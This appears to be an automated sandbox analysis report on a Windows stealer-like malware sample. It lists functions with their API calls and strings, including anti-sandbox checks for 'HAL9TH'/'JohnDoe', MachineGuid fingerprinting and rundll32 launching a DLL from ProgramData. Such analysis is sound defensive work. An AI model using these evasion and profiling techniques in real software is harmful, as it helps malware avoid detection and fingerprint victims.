                                                        • Opcode ID: 12dbe7fcf4a1c5366a6c8b97079ac701fd77e23365b543a55fd7a4ed4cd91ab6
                                                        • Instruction ID: 5bd2cd78c7e1e05e8598890a4d4afec94826bece297e4cd17d2ad1b055ab2a71
                                                        • Opcode Fuzzy Hash: 12dbe7fcf4a1c5366a6c8b97079ac701fd77e23365b543a55fd7a4ed4cd91ab6
                                                        • Instruction Fuzzy Hash: 89216DB5A00249AFCB00DFA5C8849EEBBB5EF45314F24807EF905E7250C7354945CB65
                                                        Function 004069B4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66filememoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00421EE4,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069D2
                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069E9
                                                        • LocalAlloc.KERNEL32(00000040,?,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A05
                                                        • ReadFile.KERNEL32(?,00000000,?,0040B0D3,00000000,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A1F
                                                        • LocalFree.KERNEL32(fA,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A35
                                                        • CloseHandle.KERNEL32(?,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                        • String ID: fA
                                                        • API String ID: 2311089104-3237887040
                                                        • Opcode ID: b378e3d295712ce801b2b1d367242cfbd7b69c593799b738581ac58fa9424097
                                                        • Instruction ID: 99d82336e85399a3cb73093ca8966a1f69dc6fb7ccdc32420aba1b0ca5dbf20e
                                                        • Opcode Fuzzy Hash: b378e3d295712ce801b2b1d367242cfbd7b69c593799b738581ac58fa9424097
                                                        • Instruction Fuzzy Hash: 63114971600115AFEF10AFA8CC899AA7BB9EB15304B10892AF502B2290D7749D61CFA4
                                                        Function 00403F08 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52stringnetworkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00403F34
                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00403F3D
                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00403F46
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,?,00421C30,ERROR), ref: 00403F60
                                                        • InternetCrackUrlA.WININET(00000000,00000000,?,00421C30), ref: 00403F70
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CrackInternetlstrlen
                                                        • String ID: ERROR
                                                        • API String ID: 1274457161-2861137601
                                                        • Opcode ID: 9b2c93e032ce5c219d69b1cfd439eeb9f95b83e224c1852393f10b327a8b27bb
                                                        • Instruction ID: 74e6e93b26df7e0062c086ad61b646ac24c0acbed19fa7e7018cb9e7f8595d4a
                                                        • Opcode Fuzzy Hash: 9b2c93e032ce5c219d69b1cfd439eeb9f95b83e224c1852393f10b327a8b27bb
                                                        • Instruction Fuzzy Hash: 08117331C00208AADB04AFA5D845ADE7BB8AF14324F10822AF921F71E1DB749A448B94
                                                        Function 0040EF3F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 0040EF65
                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00421EE4), ref: 0040EF81
                                                        • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,00421EE4), ref: 0040EFA0
                                                        • CharToOemA.USER32(?,?), ref: 0040EFBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CharOpenQueryValuememset
                                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                        • API String ID: 1728412123-1211650757
                                                        • Opcode ID: d0f4450c981ddf3492905aa899fc8f5131c0ed092be5f305fb4863b7abc651d1
                                                        • Instruction ID: 6ac1b1757a7fd784f0f61c8c05e9ec7213b2a3321a43d19a856fc8a3cc155d0e
                                                        • Opcode Fuzzy Hash: d0f4450c981ddf3492905aa899fc8f5131c0ed092be5f305fb4863b7abc651d1
                                                        • Instruction Fuzzy Hash: C4014FB594021DBFDB50DF90DC89EEAB77CEB14344F1000A1B544E2091DBB46E848FA4
                                                        Function 0040EB56 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00421690,?,Windows: ,00000000,?,00421690,00000000,?,Work Dir: In memory,00000000,?,00421414,00000000,?), ref: 0040EB64
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040EB6B
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 0040EB8B
                                                        • wsprintfA.USER32 ref: 0040EBB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                        • String ID: %d MB$@
                                                        • API String ID: 3644086013-3474575989
                                                        • Opcode ID: 0ba5e70b3e170c0fe519381b671de4ef6ab8282cca5240492e4f561c44769353
                                                        • Instruction ID: 8c2ce60bc7ceec496dffe3d2288b44ae3c68af09b01bcded74d772708d54bed3
                                                        • Opcode Fuzzy Hash: 0ba5e70b3e170c0fe519381b671de4ef6ab8282cca5240492e4f561c44769353
                                                        • Instruction Fuzzy Hash: 40F036B1A00104ABEB14AFA5DC4AFBE77BDF781704F440929F602E61D0DAB9D802CB75
                                                        Function 00411CA1 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 213COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040F6C3: GetSystemTime.KERNEL32(00000000,0041E266,0041E266,00421EE4,00000000), ref: 0040F6EC
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                        • ShellExecuteEx.SHELL32(?), ref: 00411EC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                        • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                        • API String ID: 2215929589-2108736111
                                                        • Opcode ID: 175778cafa32b5add943ad344a4eba07308192bc39ef03159f2a2c10d4812a85
                                                        • Instruction ID: a894f7278bb056b10d7bbf693abeb6fc214966fd3d138a887b9acb3e9c48966f
                                                        • Opcode Fuzzy Hash: 175778cafa32b5add943ad344a4eba07308192bc39ef03159f2a2c10d4812a85
                                                        • Instruction Fuzzy Hash: 0471A171D00118AACB14FBE2EC52CDEB778AE24308B50493FF516B21E2EF396655CA95
                                                        Function 0040EFCC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 0040F007
                                                          • Part of subcall function 0040FC61: malloc.MSVCRT ref: 0040FC6A
                                                          • Part of subcall function 0040FC61: strncpy.MSVCRT ref: 0040FC7A
                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0040F037
                                                        • lstrcatA.KERNEL32(?,004218C4,?,?,?,?,?,?,?), ref: 0040F051
                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 0040EFDC
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$CurrentProfilelstrcpymallocmemsetstrncpy
                                                        • String ID: Unknown
                                                        • API String ID: 277847849-1654365787
                                                        • Opcode ID: 75522e900868109fc99ba8ce89000b7f06c47d27fc93f318d97440efa3151479
                                                        • Instruction ID: 99ddae0f5b5b9cfe1fe9c9c03e0ce53e4b45f71f699afedbd2d254b77662d7e0
                                                        • Opcode Fuzzy Hash: 75522e900868109fc99ba8ce89000b7f06c47d27fc93f318d97440efa3151479
                                                        • Instruction Fuzzy Hash: 35118271E0011DA7DB14FBB2DC96FED73786B04308F40097AB609B30D1EE7896598BA5
                                                        Function 0040F1D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00421690,?,?,?,00412E1D,00000000,?,Windows: ,00000000,?,00421690,00000000,?,Work Dir: In memory), ref: 0040F1E4
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00412E1D,00000000,?,Windows: ,00000000,?,00421690,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F1EB
                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,00412E1D,00000000,?,Windows: ,00000000,?,00421690,00000000,?), ref: 0040F219
                                                        • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,000000FF,?,?,?,00412E1D,00000000,?,Windows: ,00000000,?,00421690,00000000), ref: 0040F235
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                        • String ID: Windows 11
                                                        • API String ID: 3676486918-2517555085
                                                        • Opcode ID: 5295e37cee063f129e63748948b3135a234afc134f4abdd2e68d4ac355075e47
                                                        • Instruction ID: 7946e8ff35e9286af908fd1c54bebe2b29315de24b7ee0bb64e783eb58c40ccc
                                                        • Opcode Fuzzy Hash: 5295e37cee063f129e63748948b3135a234afc134f4abdd2e68d4ac355075e47
                                                        • Instruction Fuzzy Hash: 44F06275600204BFEB206FA1DC0AFAA7ABAFB84704F101079F701E61E0D7F59944DB65
                                                        Function 0040E77B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040E7ED,0040F1F8,?,?,?,00412E1D,00000000,?,Windows: ,00000000), ref: 0040E78F
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,0040E7ED,0040F1F8,?,?,?,00412E1D,00000000,?,Windows: ,00000000,?,00421690), ref: 0040E796
                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,0040E7ED,0040F1F8,?,?,?,00412E1D,00000000,?,Windows: ), ref: 0040E7B4
                                                        • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040E7ED,0040F1F8,?,?,?,00412E1D,00000000), ref: 0040E7CF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                        • String ID: CurrentBuildNumber
                                                        • API String ID: 3676486918-1022791448
                                                        • Opcode ID: 490a0eaa4bb0ba0f05f65e4886a7557e8baa3a3315abefea976b713f8bcce0d2
                                                        • Instruction ID: 2a7954ed4342a40dcd9260330a66ebc22aeb3fce93a31ebd507df7199e066a49
                                                        • Opcode Fuzzy Hash: 490a0eaa4bb0ba0f05f65e4886a7557e8baa3a3315abefea976b713f8bcce0d2
                                                        • Instruction Fuzzy Hash: 77F03071640204BFEB106F91DC4FFAE7BBDEB45B04F101029F601A51E1DAF19940DB64
                                                        Function 00401043 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E828: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040104D,HAL9TH,0041586A), ref: 0040E834
                                                          • Part of subcall function 0040E828: HeapAlloc.KERNEL32(00000000,?,?,?,0040104D,HAL9TH,0041586A), ref: 0040E83B
                                                          • Part of subcall function 0040E828: GetComputerNameA.KERNEL32(00000000,?), ref: 0040E84F
                                                        • strcmp.MSVCRT ref: 0040104E
                                                          • Part of subcall function 0040E7F6: GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00401063,JohnDoe,0041586A), ref: 0040E802
                                                          • Part of subcall function 0040E7F6: HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00401063,JohnDoe,0041586A), ref: 0040E809
                                                          • Part of subcall function 0040E7F6: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E81D
                                                        • strcmp.MSVCRT ref: 00401064
                                                        • ExitProcess.KERNEL32 ref: 00401070
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
                                                        • String ID: HAL9TH$JohnDoe
                                                        • API String ID: 2098570390-3469431008
                                                        • Opcode ID: 0f5da8d9e59a0153e403bbe27ed1926dfc046a59a348af53d61ac695dbb2de0a
                                                        • Instruction ID: e5dc85b289bf0898a3f85ff3b4ae750546b294acf7bcf2a069b5050be5838f56
                                                        • Opcode Fuzzy Hash: 0f5da8d9e59a0153e403bbe27ed1926dfc046a59a348af53d61ac695dbb2de0a
                                                        • Instruction Fuzzy Hash: 2FD09276D4470314AD287AB7681AA4A138C89113A8320486FF801E28D3ED7DA090806D
                                                        Function 00413D09 Relevance: 7.6, APIs: 5, Instructions: 118registrystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00413D30
                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00421EE4), ref: 00413D4D
                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00421EE4), ref: 00413D6D
                                                        • lstrcatA.KERNEL32(?,?,?,00000104,?,?,00421EE4), ref: 00413D9C
                                                        • lstrcatA.KERNEL32(?,?,?,00421EE4), ref: 00413DAF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
